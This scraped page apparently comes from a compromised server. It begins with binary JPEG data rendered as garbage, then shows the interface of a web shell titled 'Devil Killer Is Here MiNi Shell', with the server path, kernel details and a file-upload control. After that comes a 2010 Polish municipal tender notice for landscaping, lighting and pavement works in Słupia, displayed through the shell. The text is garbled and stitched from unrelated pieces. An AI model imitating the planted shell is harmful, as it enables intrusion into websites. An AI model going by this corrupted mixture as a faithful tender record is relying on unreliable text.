JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100804/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100804/238286-N-2010.html

<p class="kh_header"><b>Słupia: Zagospodarowanie terenu wokół świetlicy sołeckiej wraz z remontem chodników i miejsc postojowych w centrum wsi Słupia</b><br>
<b>Numer ogłoszenia: 238286 - 2010; data zamieszczenia: 04.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Słupia , Słupia 136, 96-128 Słupia, woj. łódzkie, tel. 046 8315591, faks 046 8315514.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.slupia.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zagospodarowanie terenu wokół świetlicy sołeckiej wraz z remontem chodników i miejsc postojowych w centrum wsi Słupia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest:
1) wykonanie ogrodzenia w granicy działki Nr ewid. 974 w miejscowości Słupia z siatki plecionej powlekanej na słupkach stalowych oraz elementów stalowych zimnogietych 
i cegły klinkierowej o następujących parametrach:
a) wysokość ogrodzenia:	- od strony ulicy 1,45 m od poziomu terenu i 1,70 m dla pozostałych granic posesji;
b) rozstaw pomiędzy słupkami:	- od strony ulicy 2,65 m i 2,75 m dla pozostałych granic posesji;
c) słupki: 	- dla bram i furtki z cegły klinkierowej o przekroju 38x38 cm zakończonego od góry typowa kształtką oraz z rur stalowych: o przekroju kwadratowym 75x75x4 mm dla ogrodzenia od strony ulicy oraz 
o przekroju kołowym O76,1 mm dla pozostałych  granic posesji, otwory górne słupków stalowych zaślepić typowymi kształtkami;
d) fundamenty:			- z betonu żwirowego marki B-10 o wymiarach:
- pod słupki przęseł 30x30 cm i gł. 70 cm;
- pod słupki murowane z cegły klinkierowej 40x40 cm i gł. 80 cm;
- pod cokół z cegły klinkierowej o szerokości 25 cm i gł. 70 cm;
- pod kotwienie bramy przesuwnej: szerokości 65 cm, długości pomiędzy śrubami kotwiącymi + 50 cm i głębokość 80 cm;
e) cokół:	- od strony ulicy wykonać z cegły klinkierowej
 zakończony od góry typową kształtką i dla pozostałych granic posesji z obrzeży betonowych, 20x6 cm ustawionych na ławie fundamentowej piaskowej o grubości warstwy 5 cm;
f) przęsła:	- od strony ulicy wypełnienie z kątowników stalowych 
zimnogiętych 25x25x3 mm mocowanych przez przyspawanie do poprzeczek z kątownika stalowego zimnogiętego 35x35x3. Zakończenie górnej krawędzi przęseł - proste; 
	- dla pozostałych granic posesji: wypełnienie z siatki plecionej powlekanej;
g) furtka:				- otwierana na teren działki, wykonanie: konstrukcja 
z profili stalowych zimnogiętych, wypełnienie 
z kątowników stalowych zimnogiętych 25x25x3 mm mocowanych przez przyspawanie;
h) bramy:	- przesuwna; wykonanie: konstrukcja z profili 
stalowych zimnogiętych, wypełnienie z kątowników stalowych zimnogiętych 25x25x3 mm mocowanych przez spawanie, 
- rozwierna dwuskrzydłowa, wykonanie: konstrukcja 
z profili stalowych zimnogiętych, wypełnienie 
z kątowników stalowych zimnogiętych 25x25x3 mm mocowanych przez przyspawanie.
2) budowa oświetlenia terenu wokół świetlicy sołeckiej poprzez wykonanie min: 
a) 15 praw oświetleniowych parkowych o wysokości 4,5 m;
b) 14 opraw oświetleniowych ogrodowych o wysokościach od 0,3 -0,9 m;
c) 4 opraw doziemnych projektorowych.
d) skrzynkę zasilającą sterowniczą.
Oprawy parkowe należy instalować na fundamentach B5, a oprawy ogrodowe na wykonanych przez wykonawcę koszach zbrojeniowych.
3) nasadzenie zieleni oraz utwardzenie terenu wokół świetlicy sołeckiej poprzez:
a)	plantowanie terenu - wyrównanie terenu, dosypanie i rozścielenie ziemi;
b)	usypanie skarpy ziemią poprzez przemieszczenie rodzimego gruntu;
c)	założenie trawnika I gat.;
d)	wykonanie rabat żwirowych - wybrać ziemię na gł. 10 cm, wyłożenie agrowłókniną P-50 zasypać żwirem płukanym;
e)	wytyczenie klombów, zakopanie taśmy trawnikowej;
f)	sadzenie drzew liściastych - 31 szt., drzewa iglaste - 5 szt.;
g)	sadzenie krzewów liściastych, iglastych pnączy - 2 049 szt.;
h)	sadzenie bylin - 2 433 szt.;
i)	sadzenie żywopłotu iglastego w ilości 144 szt.;
j)	sadzenie żywopłotu liściastego w ilości 180 szt. w podwójnym rzędzie;
k)	wykonanie ścieżek pieszych z bet. kostki brukowej o pow. 360 m2 oraz kostki brukowej betonowej pod samochody osobowe w ilości 340 m2;
l)	ustawienie pergoli drewnianej o dł. 12 m o wymiarach 4 słupki 9x9x250, 
1 poprzeczka 9x4,5x1200, poprzeczki 9x4,5x60 -24 szt. co 0,5 m;
m)	ustawienie 4 szt. pergoli o wymiarach 2 słupki 9x9x250 osadzone w ocynkowanych kotwach wbitych w ziemię, 1 poprzeczka 9x4,5x300, 6 poprzeczek 9x4,5x60;
n)	wykonanie układu wodnego: 3 szt. głazów polnych o wym. 100x60x40 
z przewierconymi otworami po środku dłuższej części, pompa o wydajności 9 000 l/h; folia do oczek gr. 1,5 mm, rozmiar 3x3 m, beczka o pojemności 1 000 l, wąż ogrodowy o średnicy 20 mm;
o)	ułożenie plastikowej kratki trawnikowej na pow. 66 m2 na posypce piaskowo-betonowej grubości 20 cm, zasypane ziemią ogrodową;
p)	ustawienie ławek parkowych (180x56x75), do wkopania - 13 szt.;
q)	ustawienie koszy na śmieci - 13 szt.;
r)	paliki do drzew dł. 250 cm, średnicy 6 cm w ilości 40 szt.;
s)	przywóz ziemi ogrodowej kwaśnej pH 3,5 - 4,5 w ilości 4 m3;
t)	wywóz śmieci - 2 kontenery 74 m3;
u)	wykonanie placu zabaw poprzez dostawę i montaż:
- piaskownicy śr. 4m;
- kompleksu sportowego - 1 szt.;
-	ściany do wspinaczki - 1 szt.;
-	huśtawki skuter - 1 szt.;
-	huśtawki żabka - 1 szt.;
-	huśtawki ważka - 1 szt.;
-	huśtawki pojedynczej drewnianej - 1 szt.;
-	huśtawki podwójnej drewnianej - 1 szt.;
-	siedziska sklejka z oparciem - 1 szt.;
-	siedziska koszyk gumowy - 1 szt.
4) remont chodnika oraz miejsc postojowych poprzez:
a) rozbiórkę istniejących elementów chodnika (krawężniki, obrzeża i nawierzchnię);
b) wykonanie profilowania z zagęszczeniem istniejącego podłoża;
c) wykonanie nowych chodników oraz miejsc postojowych o nawierzchni z kostki brukowej z nowymi krawężnikami i obrzeżami;
d) na wjazdach oraz miejscach postojowych podbudowę należy wykonać z kruszywa łamanego stab. mech 0/31,5 gr. 10 cm.;
e) krawężniki na wjazdach do posesji i miejsc parkingowych należy obniżyć do rz. + 5 cm;
f) nawierzchnia chodnika z kostki brukowej gr. 6 cm, (8 cm na wjazdach i miejscach postojowych) na podsypce c-p 1:4;
f) parametry techniczne chodników: szer. 1,5 m, q=2%, q na miejscach postojowych=1% 
5) wszelkie inne prace określone w projektach budowlanych i przedmiarze robót, nie objęte w niniejszej SIWZ, a konieczne do wykonania ze względu na sztukę budowlaną.
6) pielęgnacja roślin przez 24 miesiące od dnia podpisania bez uwag protokołu odbioru 
końcowego przedmiotu zamówienia.
2. Zamówienie zostanie w pełni zrealizowane z materiałów i urządzeń wyłącznie fabrycznie nowych, które zapewni Wykonawca. Ponadto Wykonawca zapewni odpowiedni sprzęt do wykonania niniejszego zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.10-5, 45.11.27.23-9, 45.23.32.00-1, 45.23.32.22-1, 45.23.14.00-9, 45.34.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każda składana oferta musi być zabezpieczona wadium w wysokości 10  000,00 PLN  (słownie: dziesięć tysięcy złotych 00/100). 
2. Wadium wnosi się przed upływem terminu składania ofert, tj. do dnia 
19 sierpnia 2010 roku, przed godz. 10:00
3. Wadium może być wnoszone w następujących formach:
1)	pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109 poz. 1158 z późn. zm.)
4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy na konto Zamawiającego:
Bank Spółdzielczy Ziemi Łowickiej Oddział Słupia 
Nr konta: 94 9288 1079 1720 0446 3000 0030
Do oferty należy dołączyć kserokopię dowodu przelewu potwierdzającego wniesienie wadium.
5. Wadium wnoszone w innej formie niż w pieniądzu, Wykonawca zobowiązany jest załączyć do oferty oryginał dokumentu, jednak nie spięty (zszyty) na trwałe.
6. Za skuteczne wniesienie wadium w pieniądzu Zamawiający uważa wadium, które                 znajdzie się na rachunku bankowym Zamawiającego najpóźniej przed upływem terminu na składanie ofert, tj. do dnia 19 sierpnia 2010 roku do godz. 10:00
7. Wadium musi obejmować termin związania ofertą.
8. Wykonawca, który nie zabezpieczy oferty wadium zostanie wykluczony z ubiegania się o udzielenie zamówienia publicznego.
9. Pozostałe warunki dotyczące wadium określone są w art. 45 i 46 ustawy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku dotyczącego posiadania wiedzy i doświadczenia, jeżeli Wykonawca wykaże, że wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przynajmniej 1 zadanie z należytą starannością, obejmujące roboty polegające na zagospodarowaniu terenów zielonych lub rekreacyjnych o wartości minimum 100 000,00 PLN.
Oceny spełnienia warunku Zamawiający dokona na podstawie złożonego wykazu wykonanych robót budowlanych oraz załączonych dokumentów potwierdzających, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (Załącznik Nr 4 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku dotyczącego dysponowania osobami zdolnymi do wykonania zamówienia, jeżeli Wykonawca wykaże, że: 1) dysponuje do wykonania zamówienia zespołem osób z odpowiednimi uprawnieniami budowlanymi lub kwalifikacjami zawodowymi, w tym co najmniej:
a) kierownikiem robót elektrycznych - z uprawnieniami budowlanymi bez ograniczeń, lub równoważnymi, w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych posiadającego co najmniej 5-letnie doświadczenie zawodowe (liczone od uzyskania wymaganych uprawnień), w tym doświadczenie 
w pełnieniu funkcji kierownika budowy, co najmniej jednej inwestycji polegającej na budowie/przebudowie oświetlenia, będącego czynnym członkiem właściwej izby samorządu zawodowego;
b) kierownikiem robót drogowych - z uprawnieniami budowlanymi bez ograniczeń, lub równoważnymi, w specjalności drogowej, posiadającego co najmniej 5-letnie doświadczenie zawodowe (liczone od uzyskania wymaganych uprawnień), w tym doświadczenie w pełnieniu funkcji kierownika budowy, co najmniej jednej inwestycji polegającej na budowie/przebudowie chodnika/ciągu pieszego/drogi, będącego czynnym członkiem właściwej izby samorządu zawodowego;
c) architektem krajobrazu. 
Oceny spełnienia warunku Zamawiający dokona na podstawie złożonego wykazu osób przewidzianych do wykonania zamówienia (Załącznik Nr 5 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku dotyczącego sytuacji ekonomicznej i finansowej, jeżeli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej zgodnej z przedmiotem niniejszego zamówienia na kwotę nie mniejszą niż 50 000, 00 PLN;
Oceny spełnienia warunku Zamawiający dokona na podstawie złożonej opłaconej polisy,a w przypadku jej braku innego dokumentu potwierdzjacego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1) formularz oferty (Załącznik Nr 1 do SIWZ), 2) oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie w art. 22 ust. 1 - (Załącznik Nr do 2 do SIWZ) 3) dokumenty potwierdzjące uprawnienie osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych, 4) pełnomocnictwo Wykonawców wspólnie ubiegających sie o udzielenie zamówienia, 5) pełnomocnictwo / pełnomocnictwa dla osób/osoby podpisujących ofertę jeżeli upoważnienie takie nie wynika wprost z dokumentów rejestrowych, 6) zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia (Załącznik Nr 6 do SIWZ), 5) dokument potwierdzjący wniesienie wadium</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ust. 1 ustawy przewiduje możliwość dokonywania zmian w treści zawartej umowy w stosunku do treści oferty w zakresie:
1) terminu realizacji zamówienia - termin może ulec zmianie w przypadku zaistnienia nadzwyczajnych warunków atmosferycznych uniemożliwiających prawidłowe wykonywanie przedmiotu umowy na żądanie Wykonawcy, a także w przypadku natrafiania podczas realizacji na niezinwentaryzowane lub błędnie zinwentaryzowane obiekty budowlane (np. urządzenia, zabytki, wykopaliska, niewybuchy). Fakty powyższe muszą być stwierdzone przez Inspektora Nadzoru, Kierownika Budowy i zatwierdzone przez Zamawiającego w sporządzonym na tę okoliczność protokóle konieczności. Strony ustalą nowy termin z uwzględnieniem przerwy w realizacji robót który zostanie wprowadzony aneksem do umowy. 
2) zmiany osoby/osób wskazanych  w złożonej przez Wykonawcę ofercie, może nastąpić w uzasadnionych przypadkach, na wniosek Wykonawcy, za uprzednią zgodą Zamawiającego akceptującą kandydata/kandydatów na dane stanowisko (kandydat musi spełniać wymagania określone w § 5 ust. 3 pkt 1 SIWZ;
3) w zakresie podwykonawstwa (o ile zostanie przewidziane w ofercie Wykonawcy) - 
w uzasadnionych przypadkach powierzenie Podwykonawcom innej części prac niż wskazana w ofercie Wykonawcy za uprzednią zgodą Zamawiającego;
4) zmiana ceny ofertowej - jedynie w przypadku gdy Zamawiający zrezygnuje 
z wykonania pełnego zakresu robót, określonego w dokumentacji projektowej oraz STWiOR. W takim przypadku wynagrodzenie Wykonawcy zostanie zmniejszone 
w oparciu o kosztorys ofertowy, stanowiący Załącznik Nr 11 do niniejszej SIWZ;
5) w przypadku zaistnienia sytuacji powodującej wprowadzenie w trakcie realizacji zamówienia robót lub materiałów zamiennych w stosunku do określonych 
w dokumentacji projektowej -  zamienne zakresy robót lub materiały zostaną ustalone przed ich realizacją w zatwierdzonym przez Zamawiającego protokóle konieczności, 
z zastrzeżeniem nieprzekraczalności ceny ofertowej, która będzie stanowić maksymalną graniczną kwotę umówionego wynagrodzenia.</p>
